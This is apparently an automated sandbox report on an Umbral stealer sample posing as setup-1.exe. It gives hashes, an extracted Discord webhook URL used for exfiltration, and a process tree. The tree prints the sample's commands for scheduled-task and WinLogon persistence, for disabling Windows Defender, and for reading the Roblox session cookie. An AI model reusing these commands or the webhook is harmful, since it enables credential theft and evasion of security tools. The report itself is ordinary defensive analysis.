Analysis
-
max time kernel
4s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
29-02-2024 13:48
Static task
static1
Behavioral task
behavioral1
Sample
setup-1.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
setup-1.exe
Resource
win10v2004-20240226-en
General
-
Target
setup-1.exe
-
Size
244KB
-
MD5
88a46f6fad262c425ac411c1f9594c69
-
SHA1
07a58a70278d223165ba22aee94863587ceb4057
-
SHA256
b638a068653a1b5273d6a11c43d97c7cc3febdc3085243760ac9c57e04d35e10
-
SHA512
730549619dd6e8847068c4f569b3d1f9d8b49162d85d8a8a6c4a4151f1a97590d7d59dc91e15497c5ce5d020d53385f8cb8de30e159d5f34718f26ace2272001
-
SSDEEP
6144:epkye1kDlYpAoEjQnZkLdGDB6Hkn2cY3TwaRb7:kknCDSBEjEkLdM6HV3Ma
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1211276511907151963/KjUXY-OO5tQr3VnZNM1_1xmfhFv3JUJtYA090It15YMwQCWI8k2rOR5-d1J0h7UrcBe-
Signatures
-
Detect Umbral payload 5 IoCs
resource yara_rule behavioral1/files/0x000d00000001224c-7.dat family_umbral behavioral1/files/0x000d00000001224c-21.dat family_umbral behavioral1/memory/2544-23-0x0000000001240000-0x0000000001280000-memory.dmp family_umbral behavioral1/files/0x000d00000001224c-22.dat family_umbral behavioral1/memory/2544-25-0x000000001B2A0000-0x000000001B320000-memory.dmp family_umbral -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\ProgramData\\Microsoft\\Windows\\Templates\\fdbezqpr.dwo.exe" setup-1.exe -
Executes dropped EXE 1 IoCs
pid Process 2544 fdbezqpr.dwo.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 discord.com 7 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2668 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1668 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1564 PING.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2544 fdbezqpr.dwo.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 3008 wrote to memory of 1684 3008 setup-1.exe 28 PID 3008 wrote to memory of 1684 3008 setup-1.exe 28 PID 3008 wrote to memory of 1684 3008 setup-1.exe 28 PID 1684 wrote to memory of 2668 1684 CMD.exe 27 PID 1684 wrote to memory of 2668 1684 CMD.exe 27 PID 1684 wrote to memory of 2668 1684 CMD.exe 27 PID 3008 wrote to memory of 2544 3008 setup-1.exe 31 PID 3008 wrote to memory of 2544 3008 setup-1.exe 31 PID 3008 wrote to memory of 2544 3008 setup-1.exe 31 PID 2544 wrote to memory of 2416 2544 fdbezqpr.dwo.exe 32 PID 2544 wrote to memory of 2416 2544 fdbezqpr.dwo.exe 32 PID 2544 wrote to memory of 2416 2544 fdbezqpr.dwo.exe 32 PID 2544 wrote to memory of 2456 2544 fdbezqpr.dwo.exe 35 PID 2544 wrote to memory of 2456 2544 fdbezqpr.dwo.exe 35 PID 2544 wrote to memory of 2456 2544 fdbezqpr.dwo.exe 35 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2416 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup-1.exe"C:\Users\Admin\AppData\Local\Temp\setup-1.exe"1⤵
- Modifies WinLogon for persistence
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\system32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "System Update" /tr "C:\ProgramData\Microsoft\Windows\Templates\fdbezqpr.dwo.exe" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1684
-
-
C:\ProgramData\Microsoft\Windows\Templates\fdbezqpr.dwo.exe"C:\ProgramData\Microsoft\Windows\Templates\fdbezqpr.dwo.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\ProgramData\Microsoft\Windows\Templates\fdbezqpr.dwo.exe"3⤵
- Views/modifies file attributes
PID:2416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Templates\fdbezqpr.dwo.exe'3⤵PID:2456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵PID:372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵PID:2820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵PID:896
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵PID:1092
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:2944
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:3048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵PID:1268
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:1668
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\ProgramData\Microsoft\Windows\Templates\fdbezqpr.dwo.exe" && pause3⤵PID:780
-
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:1564
-
-
-
-
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "System Update" /tr "C:\ProgramData\Microsoft\Windows\Templates\fdbezqpr.dwo.exe"1⤵
- Creates scheduled task(s)
PID:2668
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
576KB
MD5f235045929731b60e7ed7b46cea8eece
SHA19b7c2f9c33157682407bed8250e5151a6a5c1b0f
SHA2566b51aafa5ab37e4c63b2ab475793cc616b5a5d91ae5fecea27137daf139d9bb2
SHA512a482630b64a714cc50985b5381cd0767e597f3a991d15ba0b252c4d2222b1ed78ae36429bf32c23b1f422d9be81f558f4be3e85abae5a55084a83decdbf927e5
-
Filesize
703KB
MD5869304fea2ba3b13f001a7ef6febb5df
SHA162c2d9557bc09ed25f57a47a04d6409505f3664b
SHA2561562dec1b422ef5727ba676225e2a5d38de84a1e45fd047765d817002ce8554b
SHA51211d343dd80be969375a54b846a2487207a04c52a21e68e02b427e9879b462731677caf96638d69cad469863083c9a6268c393349a5bdf7de8343fe682b381b84
-
Filesize
68KB
MD58298cf292b772dac968f4db3024b13f0
SHA1ba92fb47222ba2c46755ca5d59d35907d8db5e63
SHA256c82745eb82949500a7104ac86c3281d2415f90218309c6c0efe6c19a122b5a21
SHA512a13a08eacdbb007341402e8d1f63a5fa39ce6b89c9a8d9bf452d03eadfde529b4986c5765d928df125df9db0d7b410e7b9995fdca6da9cadad74325e6b0f6d54
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c30463fdb1e6b08adb2213e1bf1d1cc2
SHA12f9fb3ccfbf99032c9b0ebe0a67a4a88e7b2c530
SHA2560c6c1540937384e22c161998521b77d57b28e521f3090dd0fe7839e31ab2ce00
SHA512880a7a61a90f9cf0659022dc0cd21f4eb7fbf91b96f19e754d3da96971dbec39c08407ec2abad464fa8a3f258abfac1bb09ec51c23d372bceef5c2b15f3167f2